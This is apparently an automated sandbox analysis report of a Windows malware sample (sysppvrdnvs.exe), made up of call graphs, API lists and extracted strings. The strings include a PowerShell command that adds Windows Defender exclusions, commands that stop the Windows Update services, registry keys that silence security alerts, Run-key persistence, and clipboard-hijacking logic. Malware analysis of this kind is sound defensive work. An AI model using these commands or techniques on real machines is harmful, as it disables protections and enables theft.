5709 401c3c 5708->5709 5710 40ab60 __aligned_recalloc_base 3 API calls 5709->5710 5710->5711 5711->5689 5712 40bdd0 5713 40bdd3 WaitForSingleObject 5712->5713 5714 40be01 5713->5714 5715 40bdeb InterlockedDecrement 5713->5715 5716 40bdfa 5715->5716 5716->5713 5717 40b510 15 API calls 5716->5717 5717->5716 5718 40dfd0 5728 4013b0 5718->5728 5720 40e05d 5722 40dff7 InterlockedExchangeAdd 5723 40e03b WaitForSingleObject 5722->5723 5724 40dfdd 5722->5724 5723->5724 5725 40e054 5723->5725 5724->5720 5724->5722 5724->5723 5740 40bbb0 EnterCriticalSection 5724->5740 5745 40bed0 5724->5745 5748 401330 5725->5748 5729 40a740 7 API calls 5728->5729 5730 4013bb CreateEventA socket 5729->5730 5731 4013f2 5730->5731 5732 4013f8 5730->5732 5733 401330 7 API calls 5731->5733 5734 401401 bind 5732->5734 5735 401462 5732->5735 5733->5732 5736 401444 CreateThread 5734->5736 5737 401434 5734->5737 5735->5724 5736->5735 5738 401330 7 API calls 5737->5738 5739 40143a 5738->5739 5739->5724 5741 40bbe7 LeaveCriticalSection 5740->5741 5742 40bbcf 5740->5742 5741->5724 5743 40c870 3 API calls 5742->5743 5744 40bbda 5743->5744 5744->5741 5746 40be30 13 API calls 5745->5746 5747 40bf11 5746->5747 5747->5724 5749 401339 5748->5749 5757 40139b 5748->5757 5750 401341 SetEvent WaitForSingleObject 5749->5750 5749->5757 5755 401362 5750->5755 5751 40138b 5758 40b4f0 shutdown closesocket 5751->5758 5753 40ab60 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5753->5755 5754 401395 5756 40ab60 __aligned_recalloc_base 3 API calls 5754->5756 5755->5751 5755->5753 5756->5757 5757->5720 5758->5754 5759 40d9d0 5760 40da3e 5759->5760 5761 40d9e6 5759->5761 5761->5760 5762 40d9f0 5761->5762 5763 40da43 5761->5763 5764 40da93 5761->5764 5767 40a740 7 API calls 5762->5767 5765 40da68 5763->5765 5766 40da5b InterlockedDecrement 5763->5766 5793 40c570 5764->5793 5769 40ab60 __aligned_recalloc_base 3 API calls 5765->5769 5766->5765 5770 40d9fd 5767->5770 5771 40da74 5769->5771 5782 4023d0 5770->5782 5773 40ab60 __aligned_recalloc_base 3 API calls 5771->5773 5773->5760 5776 40dab9 5776->5760 5779 40daf1 IsBadReadPtr 5776->5779 5781 40bf20 186 API calls 5776->5781 5798 40c670 5776->5798 5778 40da2b InterlockedIncrement 5778->5760 5779->5776 5781->5776 5783 402413 5782->5783 5784 4023d9 5782->5784 5786 40b6f0 5783->5786 5784->5783 5785 4023ea InterlockedIncrement 5784->5785 5785->5783 5787 40b780 2 API calls 5786->5787 5788 40b6ff 5787->5788 5789 40b70d EnterCriticalSection 5788->5789 5790 40b709 5788->5790 5791 40b72c LeaveCriticalSection 5789->5791 5790->5760 5790->5778 5791->5790 5794 40c583 5793->5794 5795 40c5ad memcpy 5793->5795 5796 40a990 9 API calls 5794->5796 5795->5776 5797 40c5a4 5796->5797 5797->5795 5799 40c699 5798->5799 5800 40c68e 5798->5800 5799->5800 5801 40c6b1 memmove 5799->5801 5800->5776 5801->5800 5964 40f910 5965 40f92e 5964->5965 5967 40f9c4 5964->5967 5966 40fb45 NtQueryVirtualMemory 5965->5966 5969 40f949 5966->5969 5968 40fa30 RtlUnwind 5968->5969 5969->5967 5969->5968 5970 40d510 5971 40b6f0 4 API calls 5970->5971 5972 40d523 5971->5972 5973 40d53a 5972->5973 5975 40d550 InterlockedExchangeAdd 5972->5975 5976 40d566 5975->5976 5977 40d56d 5975->5977 5976->5973 5992 40d840 5977->5992 5980 40d58d InterlockedIncrement 5989 40d597 5980->5989 5981 40bed0 13 API calls 5981->5989 5982 40d5c0 5999 40b3d0 inet_ntoa 5982->5999 5984 40d5cc 5985 40d690 InterlockedDecrement 5984->5985 6000 40b4f0 shutdown closesocket 5985->6000 5987 40a950 __aligned_recalloc_base 7 API calls 5987->5989 5988 40d770 6 API calls 5988->5989 5989->5981 5989->5982 5989->5985 5989->5987 5989->5988 5990 40bf20 186 API calls 5989->5990 5991 40ab60 __aligned_recalloc_base 3 API calls 5989->5991 5990->5989 5991->5989 5993 40d84d socket 5992->5993 5994 40d862 htons connect 5993->5994 5995 40d8bf 5993->5995 5994->5995 5996 40d8aa 5994->5996 5995->5993 5997 40d57d 5995->5997 6001 40b4f0 shutdown closesocket 5996->6001 5997->5976 5997->5980 5999->5984 6000->5976 6001->5997 6002 401920 GetTickCount WaitForSingleObject 6003 401ac9 6002->6003 6004 40194d WSAWaitForMultipleEvents 6002->6004 6005 4019f0 GetTickCount 6004->6005 6006 40196a WSAEnumNetworkEvents 6004->6006 6007 401a43 GetTickCount 6005->6007 6008 401a05 EnterCriticalSection 6005->6008 6006->6005 6022 401983 6006->6022 6011 401ab5 WaitForSingleObject 6007->6011 6012 401a4e EnterCriticalSection 6007->6012 6009 401a16 6008->6009 6010 401a3a LeaveCriticalSection 6008->6010 6016 401a29 LeaveCriticalSection 6009->6016 6044 401820 6009->6044 6010->6011 6011->6003 6011->6004 6014 401aa1 LeaveCriticalSection GetTickCount 6012->6014 6015 401a5f InterlockedExchangeAdd 6012->6015 6013 401992 accept 6013->6005 6013->6022 6014->6011 6062 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 6015->6062 6016->6011 6020 401a72 6020->6014 6020->6015 6063 40b4f0 shutdown closesocket 6020->6063 6022->6005 6022->6013 6023 401cf0 7 API calls 6022->6023 6024 4022c0 6022->6024 6023->6005 6025 4022d2 EnterCriticalSection 6024->6025 6026 4022cd 6024->6026 6027 4022e7 6025->6027 6028 4022fd LeaveCriticalSection 6025->6028 6026->6022 6027->6028 6029 402308 6028->6029 6030 40230f 6028->6030 6029->6022 6031 40a740 7 API calls 6030->6031 6032 402319 6031->6032 6033 402326 getpeername CreateIoCompletionPort 6032->6033 6034 4023b8 6032->6034 6035 4023b2 6033->6035 6036 402366 6033->6036 6066 40b4f0 shutdown closesocket 6034->6066 6040 40ab60 __aligned_recalloc_base 3 API calls 6035->6040 6064 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 6036->6064 6038 4023c3 6038->6022 6040->6034 6041 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6065 4021e0 EnterCriticalSection LeaveCriticalSection 6041->6065 6043 4023ab 6043->6022 6045 40190f 6044->6045 6046 401830 6044->6046 6045->6010 6046->6045 6047 40183d InterlockedExchangeAdd 6046->6047 6047->6045 6053 401854 6047->6053 6048 401880 6049 401891 6048->6049 6076 40b4f0 shutdown closesocket 6048->6076 6051 4018a7 InterlockedDecrement 6049->6051 6054 401901 6049->6054 6051->6054 6053->6045 6053->6048 6067 4017a0 EnterCriticalSection 6053->6067 6055 402247 6054->6055 6056 402265 EnterCriticalSection 6054->6056 6055->6010 6057 40229c LeaveCriticalSection DeleteCriticalSection 6056->6057 6060 40227d 6056->6060 6058 40ab60 __aligned_recalloc_base 3 API calls 6057->6058 6058->6055 6059 40ab60 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 6059->6060 6060->6059 6061 40229b 6060->6061 6061->6057 6062->6020 6063->6020 6064->6041 6065->6043 6066->6038 6068 401807 LeaveCriticalSection 6067->6068 6069 4017ba InterlockedExchangeAdd 6067->6069 6068->6053 6070 4017ca LeaveCriticalSection 6069->6070 6071 4017d9 6069->6071 6070->6053 6072 40ab60 __aligned_recalloc_base 3 API calls 6071->6072 6073 4017fe 6072->6073 6074 40ab60 __aligned_recalloc_base 3 API calls 6073->6074 6075 401804 6074->6075 6075->6068 6076->6049 6077 40dfa0 6080 401200 6077->6080 6079 40dfc2 6081 40121d 6080->6081 6095 401314 6080->6095 6082 40a950 __aligned_recalloc_base 7 API calls 6081->6082 6081->6095 6083 401247 memcpy htons 6082->6083 6084 4012ed 6083->6084 6085 401297 sendto 6083->6085 6086 40ab60 __aligned_recalloc_base 3 API calls 6084->6086 6087 4012b6 InterlockedExchangeAdd 6085->6087 6088 4012e9 6085->6088 6090 4012fc 6086->6090 6087->6085 6091 4012cc 6087->6091 6088->6084 6089 40130a 6088->6089 6092 40ab60 __aligned_recalloc_base 3 API calls 6089->6092 6090->6079 6093 40ab60 __aligned_recalloc_base 3 API calls 6091->6093 6092->6095 6094 4012db 6093->6094 6094->6079 6095->6079 6096 40eba1 6097 40ebaa 6096->6097 6098 40ec9d 6097->6098 6099 40ec13 lstrcmpiW 6097->6099 6100 40ec93 SysFreeString 6099->6100 6101 40ec26 6099->6101 6100->6098 6102 40e990 2 API calls 6101->6102 6104 40ec34 6102->6104 6103 40ec85 6103->6100 6104->6100 6104->6103 6105 40ec63 lstrcmpiW 6104->6105 6106 40ec75 6105->6106 6107 40ec7b SysFreeString 6105->6107 6106->6107 6107->6103 5802 406de4 5804 406d8a 5802->5804 5803 406dba lstrcmpiW 5803->5804 5804->5803 5805 406f35 FindNextFileW 5804->5805 5808 406e21 PathMatchSpecW 5804->5808 5811 406e9f PathFileExistsW 5804->5811 5815 4067a0 11 API calls 5804->5815 5806 406f51 FindClose 5805->5806 5807 406d5e lstrcmpW 5805->5807 5812 406f5e 5806->5812 5807->5804 5810 406d74 lstrcmpW 5807->5810 5808->5804 5809 406e42 wsprintfW SetFileAttributesW DeleteFileW 5808->5809 5809->5804 5810->5804 5811->5804 5813 406eb5 wsprintfW wsprintfW 5811->5813 5813->5804 5814 406f1f MoveFileExW 5813->5814 5814->5805 5815->5804 6108 40792a ExitThread 5816 40e070 5822 401470 5816->5822 5818 40e084 5819 40e0af 5818->5819 5820 40e095 WaitForSingleObject 5818->5820 5821 401330 7 API calls 5820->5821 5821->5819 5823 401483 5822->5823 5824 401572 5822->5824 5823->5824 5825 40a740 7 API calls 5823->5825 5824->5818 5826 401498 CreateEventA socket 5825->5826 5827 4014cf 5826->5827 5832 4014d5 5826->5832 5829 401330 7 API calls 5827->5829 5828 4014e2 htons setsockopt bind 5830 401546 5828->5830 5831 401558 CreateThread 5828->5831 5829->5832 5833 401330 7 API calls 5830->5833 5831->5824 5835 401100 5831->5835 5832->5824 5832->5828 5834 40154c 5833->5834 5834->5818 5836 401115 ioctlsocket 5835->5836 5837 4011e4 5836->5837 5839 40113a 5836->5839 5838 40ab60 __aligned_recalloc_base 3 API calls 5837->5838 5841 4011ea 5838->5841 5840 4011cd WaitForSingleObject 5839->5840 5842 40a990 9 API calls 5839->5842 5843 401168 recvfrom 5839->5843 5844 4011ad InterlockedExchangeAdd 5839->5844 5840->5836 5840->5837 5842->5839 5843->5839 5843->5840 5846 401000 5844->5846 5847 401014 5846->5847 5848 40103b 5847->5848 5849 40a740 7 API calls 5847->5849 5857 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 5848->5857 5849->5848 5851 40105b 5858 401580 5851->5858 5853 4010ec 5853->5839 5854 4010a3 IsBadReadPtr 5855 401071 5854->5855 5855->5853 5855->5854 5856 4010d8 memmove 5855->5856 5856->5855 5857->5851 5859 401592 5858->5859 5860 4015a5 memcpy 5858->5860 5861 40a990 9 API calls 5859->5861 5863 4015c1 5860->5863 5862 40159f 5861->5862 5862->5860 5863->5855 6109 40d6b0 6114 40d710 6109->6114 6112 40d6de 6113 40d710 send 6113->6112 6115 40d721 send 6114->6115 6116 40d6c3 6115->6116 6117 40d73e 6115->6117 6116->6112 6116->6113 6117->6115 6117->6116 6118 40d930 6123 40d934 6118->6123 6119 40bbb0 5 API calls 6119->6123 6120 40d950 WaitForSingleObject 6122 40d975 6120->6122 6120->6123 6121 40d550 200 API calls 6121->6123 6123->6119 6123->6120 6123->6121 6123->6122 6124 4059b0 GetWindowLongW 6125 4059d4 6124->6125 6126 4059f6 6124->6126 6127 4059e1 6125->6127 6128 405a67 IsClipboardFormatAvailable 6125->6128 6130 405a46 6126->6130 6131 405a2e SetWindowLongW 6126->6131 6142 4059f1 6126->6142 6134 405a04 SetClipboardViewer SetWindowLongW 6127->6134 6135 4059e7 6127->6135 6132 405a83 IsClipboardFormatAvailable 6128->6132 6133 405a7a 6128->6133 6129 405be4 DefWindowProcA 6136 405a4c SendMessageA 6130->6136 6130->6142 6131->6142 6132->6133 6137 405a98 IsClipboardFormatAvailable 6132->6137 6139 405ab5 OpenClipboard 6133->6139 6140 405b7c 6133->6140 6134->6129 6138 405b9d RegisterRawInputDevices ChangeClipboardChain 6135->6138 6135->6142 6136->6142 6137->6133 6138->6129 6139->6140 6143 405ac5 GetClipboardData 6139->6143 6141 405b85 SendMessageA 6140->6141 6140->6142 6141->6142 6142->6129 6143->6142 6144 405add GlobalLock 6143->6144 6144->6142 6145 405af5 6144->6145 6146 405b08 6145->6146 6147 405b29 6145->6147 6148 405b3e 6146->6148 6149 405b0e 6146->6149 6150 40d250 13 API calls 6147->6150 6165 4057f0 6148->6165 6151 405b14 GlobalUnlock CloseClipboard 6149->6151 6159 405680 6149->6159 6150->6151 6151->6140 6155 405b67 6151->6155 6173 404970 lstrlenW 6155->6173 6158 40ab60 __aligned_recalloc_base 3 API calls 6158->6140 6160 40568b 6159->6160 6161 405691 lstrlenW 6160->6161 6162 4056a4 6160->6162 6163 40a950 __aligned_recalloc_base 7 API calls 6160->6163 6164 4056c1 lstrcpynW 6160->6164 6161->6160 6161->6162 6162->6151 6163->6160 6164->6160 6164->6162 6168 4057fd 6165->6168 6166 405803 lstrlenA 6166->6168 6172 405816 6166->6172 6167 405740 2 API calls 6167->6168 6168->6166 6168->6167 6169 40a950 __aligned_recalloc_base 7 API calls 6168->6169 6171 40ab60 __aligned_recalloc_base 3 API calls 6168->6171 6168->6172 6207 4057a0 6168->6207 6169->6168 6171->6168 6172->6151 6181 4049a4 6173->6181 6174 404bfd 6174->6158 6175 404e81 StrStrW 6176 404e94 6175->6176 6177 404e98 StrStrW 6175->6177 6176->6177 6179 404eab 6177->6179 6180 404eaf StrStrW 6177->6180 6178 404c0f 6178->6174 6178->6175 6179->6180 6182 404ec2 6180->6182 6181->6174 6181->6178 6184 404d90 StrStrW 6181->6184 6191 404ed8 6182->6191 6212 4048a0 lstrlenW 6182->6212 6184->6178 6185 404dbb StrStrW 6184->6185 6185->6178 6186 404de6 StrStrW 6185->6186 6186->6178 6187 4054aa StrStrW 6192 4054c4 StrStrW 6187->6192 6193 4054bd 6187->6193 6188 40544f StrStrW 6189 405462 6188->6189 6190 40546b StrStrW 6188->6190 6189->6187 6190->6189 6196 405487 StrStrW 6190->6196 6191->6174 6191->6187 6191->6188 6194 4054d7 6192->6194 6195 4054de StrStrW 6192->6195 6193->6192 6194->6195 6197 4054f1 6195->6197 6198 4054f8 StrStrW 6195->6198 6196->6189 6197->6198 6199 405512 StrStrW 6198->6199 6200 40550b 6198->6200 6202 405525 lstrlenA 6199->6202 6200->6199 6202->6174 6203 4055ff GlobalAlloc 6202->6203 6203->6174 6204 40561a GlobalLock 6203->6204 6204->6174 6205 40562d memcpy GlobalUnlock OpenClipboard 6204->6205 6205->6174 6206 40565a EmptyClipboard SetClipboardData CloseClipboard 6205->6206 6206->6174 6208 4057ab 6207->6208 6209 4057b1 lstrlenA 6208->6209 6210 405740 2 API calls 6208->6210 6211 4057e4 6208->6211 6209->6208 6210->6208 6211->6168 6213 4048c4 6212->6213 6214 40490d 6213->6214 6215 404911 iswalpha 6213->6215 6216 40492c iswdigit 6213->6216 6214->6191 6215->6213 6215->6216 6216->6213 5864 4084f9 5865 408502 5864->5865 5866 408511 34 API calls 5865->5866 5867 409346 5865->5867 6217 405fbd 6219 405f51 6217->6219 6218 40ab60 __aligned_recalloc_base 3 API calls 6220 405fc8 LeaveCriticalSection 6218->6220 6221 405fa6 memcpy 6219->6221 6222 405fbb 6219->6222 6221->6222 6222->6218 6224 40ac3e 6225 40ab60 __aligned_recalloc_base 3 API calls 6224->6225 6228 40abfd 6225->6228 6226 40ac12 6227 40a950 __aligned_recalloc_base 7 API calls 6227->6228 6228->6226 6228->6227 6229 40ac14 memcpy 6228->6229 6229->6228

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 00407940 Relevance: 282.5, APIs: 103, Strings: 58, Instructions: 749sleepfilesynchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 0 407940-407974 Sleep CreateMutexA GetLastError 1 407976-407978 ExitProcess 0->1 2 40797e-407a1d GetModuleFileNameW PathFindFileNameW wsprintfW DeleteFileW ExpandEnvironmentStringsW wcscmp 0->2 3 407d31-407d9d Sleep ShellExecuteW * 2 RegOpenKeyExW 2->3 4 407a23-407a2e call 40f1b0 2->4 6 407dcb-407df6 RegOpenKeyExW 3->6 7 407d9f-407dc5 RegSetValueExW RegCloseKey 3->7 13 407a30-407a32 ExitProcess 4->13 14 407a38-407a86 ExpandEnvironmentStringsW wsprintfW CopyFileW 4->14 8 407e24-407e4f RegOpenKeyExW 6->8 9 407df8-407e1e RegSetValueExW RegCloseKey 6->9 7->6 11 407e51-407e77 RegSetValueExW RegCloseKey 8->11 12 407e7d-407ea8 RegOpenKeyExW 8->12 9->8 11->12 15 407ed6-407f01 RegOpenKeyExW 12->15 16 407eaa-407ed0 RegSetValueExW RegCloseKey 12->16 17 407b36-407b78 Sleep wsprintfW CopyFileW 14->17 18 407a8c-407ac6 SetFileAttributesW RegOpenKeyExW 14->18 19 407f03-407f29 RegSetValueExW RegCloseKey 15->19 20 407f2f-407f5a RegOpenKeyExW 15->20 16->15 22 407c28-407c81 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 17->22 23 407b7e-407bb8 SetFileAttributesW RegOpenKeyExW 17->23 18->17 21 407ac8-407afb wcslen RegSetValueExW 18->21 19->20 25 407f88-407fb3 RegOpenKeyExW 20->25 26 407f5c-407f82 RegSetValueExW RegCloseKey 20->26 27 407b29-407b30 RegCloseKey 21->27 28 407afd-407b1f RegCloseKey call 40f400 21->28 22->3 24 407c87-407cc1 SetFileAttributesW RegOpenKeyExW 22->24 23->22 29 407bba-407bed wcslen RegSetValueExW 23->29 24->3 32 407cc3-407cf6 wcslen RegSetValueExW 24->32 34 407fb5-408019 RegSetValueExW * 3 RegCloseKey 25->34 35 40801f-40804a RegOpenKeyExW 25->35 26->25 27->17 28->27 44 407b21-407b23 ExitProcess 28->44 30 407c1b-407c22 RegCloseKey 29->30 31 407bef-407c11 RegCloseKey call 40f400 29->31 30->22 31->30 49 407c13-407c15 ExitProcess 31->49 37 407d24-407d2b RegCloseKey 32->37 38 407cf8-407d1a RegCloseKey call 40f400 32->38 34->35 40 408050-4080d3 RegSetValueExW * 4 RegCloseKey 35->40 41 4080d9-408104 RegOpenKeyExW 35->41 37->3 38->37 52 407d1c-407d1e ExitProcess 38->52 40->41 45 4081f0-40821b RegOpenKeyExW 41->45 46 40810a-4081ea RegSetValueExW * 7 RegCloseKey 41->46 47 408221-408301 RegSetValueExW * 7 RegCloseKey 45->47 48 408307-40831c Sleep call 40d180 45->48 46->45 47->48 54 408491-40849a 48->54 55 408322-40848e WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405c00 call 40e0c0 call 407390 CreateEventA call 40c8b0 call 40dbb0 call 40bc70 call 40dbe0 * 4 call 40dd50 call 40de90 48->55 55->54
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 0040794E
                                                                                                                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,mmn7nnm8na), ref: 0040795D
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00407969
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00407978
                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,004161D0,00000105), ref: 004079B2
                                                                                                                                                                                                      • PathFindFileNameW.SHLWAPI(004161D0), ref: 004079BD
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004079DA
                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?), ref: 004079EA
                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407A01
                                                                                                                                                                                                      • wcscmp.NTDLL ref: 00407A13
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00407A32
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                                                                                                                                                      • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -$/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait$AlwaysAutoUpdate$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$AutoUpdateOptions$DisableWindowsUpdate$DisableWindowsUpdate$EnableWindowsUpdate$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$OverrideNotice$PreventDownload$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Policies\Microsoft\Windows\UpdateOrchestrator$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\DoSvc$SYSTEM\CurrentControlSet\Services\UsoSvc$SYSTEM\CurrentControlSet\Services\WaaSMedicSvc$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$Start$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$cmd.exe$cmd.exe$mmn7nnm8na$open$open$sysppvrdnvs.exe
                                                                                                                                                                                                      • API String ID: 4172876685-159212852
                                                                                                                                                                                                      • Opcode ID: a4de16f9cd9a57b13bb64e1272bcdec428ac0ec926cd71be17685e2324921950
                                                                                                                                                                                                      • Instruction ID: 367eef7d7cdc4f6bbf58631969cb55eb0d30a7b17f9c19f9a6cac2e90da0940f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4de16f9cd9a57b13bb64e1272bcdec428ac0ec926cd71be17685e2324921950
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 245240B1A80318BBE7209BA0DC4AFD97775AB48B15F1081A5B309B61D0D7F5AAC4CF5C

                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                      Function 004068E0 Relevance: 105.4, APIs: 47, Strings: 13, Instructions: 407fileCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 82 4068e0-4068f5 _chkstk 83 4068f7-4068f9 82->83 84 4068fe-4069d0 wsprintfW * 6 PathFileExistsW 82->84 85 406f64-406f67 83->85 86 4069d2-4069f3 call 40f1f0 84->86 87 406a14-406a23 PathFileExistsW 84->87 86->87 97 4069f5-406a0e SetFileAttributesW DeleteFileW 86->97 89 406ac4-406acd 87->89 90 406a29-406a38 PathFileExistsW 87->90 91 406af5-406b04 PathFileExistsW 89->91 92 406acf-406ada call 4064a0 89->92 94 406a59-406a68 PathFileExistsW 90->94 95 406a3a-406a53 SetFileAttributesW DeleteFileW 90->95 98 406b06-406b26 call 40f1f0 91->98 99 406b47-406b56 PathFileExistsW 91->99 92->91 110 406adc-406af0 call 40f1f0 92->110 100 406a6a-406a7b CreateDirectoryW 94->100 101 406a8c-406a9b PathFileExistsW 94->101 95->94 97->87 98->99 119 406b28-406b41 SetFileAttributesW DeleteFileW 98->119 105 406b58-406b62 99->105 106 406bca-406bd9 PathFileExistsW 99->106 100->101 104 406a7d-406a86 SetFileAttributesW 100->104 101->89 107 406a9d-406ab3 CopyFileW 101->107 104->101 105->106 112 406b64-406b71 PathFileExistsW 105->112 108 406c75-406c96 FindFirstFileW 106->108 109 406bdf-406bee PathFileExistsW 106->109 107->89 113 406ab5-406abe SetFileAttributesW 107->113 116 406c9c-406d54 108->116 117 406f5e 108->117 114 406bf0-406bf6 109->114 115 406c2c-406c32 109->115 110->91 112->106 120 406b73-406b89 CopyFileW 112->120 113->89 122 406c12-406c27 call 406660 114->122 123 406bf8-406c10 call 406660 114->123 126 406c34-406c4c call 406660 115->126 127 406c4e-406c63 call 406660 115->127 124 406d5e-406d72 lstrcmpW 116->124 117->85 119->99 120->106 121 406b8b-406ba9 SetFileAttributesW PathFileExistsW 120->121 121->106 128 406bab-406bc4 SetFileAttributesW DeleteFileW 121->128 143 406c2a 122->143 123->143 131 406d74-406d88 lstrcmpW 124->131 132 406d8a 124->132 141 406c66-406c6f SetFileAttributesW 126->141 127->141 128->106 131->132 137 406d8f-406da0 131->137 138 406f35-406f4b FindNextFileW 132->138 144 406db1-406db8 137->144 138->124 142 406f51-406f58 FindClose 138->142 141->108 142->117 143->141 145 406de6-406def 144->145 146 406dba-406dd7 lstrcmpiW 144->146 147 406df1 145->147 148 406df6-406e07 145->148 149 406dd9 146->149 150 406ddb-406de2 146->150 147->138 151 406e18-406e1f 148->151 149->144 150->145 153 406e21-406e3e PathMatchSpecW 151->153 154 406e8f-406e98 151->154 155 406e40 153->155 156 406e42-406e88 wsprintfW SetFileAttributesW DeleteFileW 153->156 157 406e9a 154->157 158 406e9f-406eae PathFileExistsW 154->158 155->151 156->154 157->138 160 406eb0 158->160 161 406eb5-406f05 wsprintfW * 2 158->161 160->138 162 406f07-406f1d call 4067a0 161->162 163 406f1f-406f2f MoveFileExW 161->163 162->138 163->138
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000011.00000002.1674492783.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674474259.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674511669.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000011.00000002.1674528488.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$wsprintf$ExistsPath$AttributesDelete$CreateDirectory_chkstk
                                                                                                                                                                                                      • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\rvlcfg.exe$%s\%s\rvldrv.exe$%s\*$shell32.dll$shell32.dll$shell32.dll$shell32.dll
                                                                                                                                                                                                      • API String ID: 495142193-638321828
                                                                                                                                                                                                      • Opcode ID: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                                                                                      • Instruction ID: 1e7642a3bb229a683b77cec8f60a4b6186945a0df842d4041ba496de3fd539ef
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bba10b6da6457b63d7fe7870a3bcf93d38d67b95bd357d565e7f9915594a4b88
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 500270B5900218EBDB20DB60DC44FEA7778BF44705F0485EAF50AA6190DBB89BD4CF69
                                                                                                                                                                                                      Function 004067A0 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85filestringCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 746 4067a0-4067ef CreateDirectoryW wsprintfW FindFirstFileW 747 4067f5-406809 lstrcmpW 746->747 748 4068cf-4068d2 746->748 749 406821 747->749 750 40680b-40681f lstrcmpW 747->750 751 40689c-4068b2 FindNextFileW 749->751 750->749 752 406823-40686c wsprintfW * 2 750->752 751->747 755 4068b8-4068c9 FindClose RemoveDirectoryW 751->755 753 406886-406896 MoveFileExW 752->753 754 40686e-406884 call 4067a0 752->754 753->751 754->751 755->748
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(00406F1A,00000000), ref: 004067AF
                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004067C5
                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004067DC
